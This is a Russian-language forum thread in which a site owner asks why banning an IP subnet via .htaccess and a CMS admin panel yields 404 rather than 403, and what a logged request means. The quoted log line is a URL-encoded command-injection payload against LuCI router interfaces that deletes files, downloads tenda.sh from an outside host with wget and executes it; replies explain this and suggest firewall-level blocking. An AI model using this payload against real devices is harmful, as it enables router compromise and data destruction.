Перейти к публикации

Подскажите по запросу к сайту и бану по ip


Рекомендованные сообщения

Всем привет!

Подскажите пжлста... почему данный ip или подсеть невозможно забанить? хоть в админке, хоть в .htaccess?

*Подозреваю, что это вероятно из-за специфического запроса ниже:

ip: 185.224.128.200     (185.224.128.0/24)

GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.0

И что он вообще пытается сделать? (желательно простым языком, без премудростей о том, какие запросы к серверу бывают и, что они делают).

*Нашел: "LuCI ‒ это веб-ориентированный интерфейс конфигурирования, написанный на языке программирования Lua. LuCI расшифровывается как Lua Configuration Interface." - но это безусловно мне ничего особо не говорит, кроме того, что хотят что-то записать(operation=write)... Да и о том ли я вообще?! )))

Скрытый текст

сайт в разработке, лицуха +

 

Изменено пользователем desart
Ссылка на сообщение
Поделиться на других сайтах
9 часов назад, desart сказал:

Подскажите пжлста... почему данный ip или подсеть невозможно забанить? хоть в админке, хоть в .htaccess?

Как вы проверяете что нельзя? По логам сервера? Так если вы баните в DLE, то в логах сервера все также и будет присутствовать, потому что забанив в DLE, это не запрещает доступ к серверу, это запрещает доступ к DLE, а в логах все также будет присутствовать. Чтобы не видеть в логах, то и банить нужно на уровне файерволла сервера и блокировать доступ на уровне сервера.

Ссылка на сообщение
Поделиться на других сайтах
12 часов назад, celsoft сказал:

Как вы проверяете что нельзя? По логам сервера?

Да, по логам... * Да, надо было указать, что хочу сделать 403 и не получается...

Забиваю подсеть в .htaccess и по ней идёт 403(любые другие ip и подсети). А в данном случае идёт ошибка 404 - значит он попадает на стандартную страницу 404 - чего я и не могу понять...

"Чтобы не видеть в логах..." - этого я не пытался сделать... я хотел 403 для него т.к. я его вставил и в админке 185.224.128.* и в .htaccess - Deny from 185.224.128.0/24 и по итогу 404... другими словами на сервере нет чего ему надо(запрос не выполняется), НО и 403 ошибки доступа не выдаёт...

*Да и вообще интересно, что за запрос такой...

Изменено пользователем desart
Ссылка на сообщение
Поделиться на других сайтах
10 часов назад, desart сказал:

Да, по логам... * Да, надо было указать, что хочу сделать 403 и не получается...

Забиваю подсеть в .htaccess и по ней идёт 403(любые другие ip и подсети). А в данном случае идёт ошибка 404 - значит он попадает на стандартную страницу 404 - чего я и не могу понять...

"Чтобы не видеть в логах..." - этого я не пытался сделать... я хотел 403 для него т.к. я его вставил и в админке 185.224.128.* и в .htaccess - Deny from 185.224.128.0/24 и по итогу 404... другими словами на сервере нет чего ему надо(запрос не выполняется), НО и 403 ошибки доступа не выдаёт...

*Да и вообще интересно, что за запрос такой...

На сколько я помню и раньше интересовался банами по ip для сайта, хостер мне всегда писал что надо банить не в файлике папки домена, а где то в корне вашего хостинга есть тоже файлик .htaccess и именно в нем надо прописывать ip банов

Ссылка на сообщение
Поделиться на других сайтах
10 часов назад, desart сказал:

и в .htaccess - Deny from 185.224.128.0/24 и по итогу 404.

Deny from далеко не на каждой версии Апача можно выполнить, плюс этот запрос может вообще идти не на Апач. Как правильно запретить доступ на сервер нужно узнавать в службе поддержки.

Ссылка на сообщение
Поделиться на других сайтах
29.02.2024 в 04:56, desart сказал:

И что он вообще пытается сделать?

Пытается загрузить исполняемый файл (в linux) tenda.sh, установить на него нужные ему права и запустить. А вот чтО конкретно запустить уже хз.

Ссылка на сообщение
Поделиться на других сайтах

Возможно это атака, нацеленая на веб-интерфейс LuCI для маршрутизаторов.

cgi-bin/luci/;stok=/locale: Это путь к CGI-скрипту в интерфейсе LuCI. LuCI - это веб-интерфейс для маршрутизаторов OpenWRT или аналогичных устройств.

form=country&operation=write&country=: Это параметры, передаваемые CGI-скрипту.

В итоге tenda.sh загружается в папку /tmp, удаляет все файлы,загружает какой-то сценарий оболочки с удаленного сервера и выполнить его.

Ну вот както так.

 

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...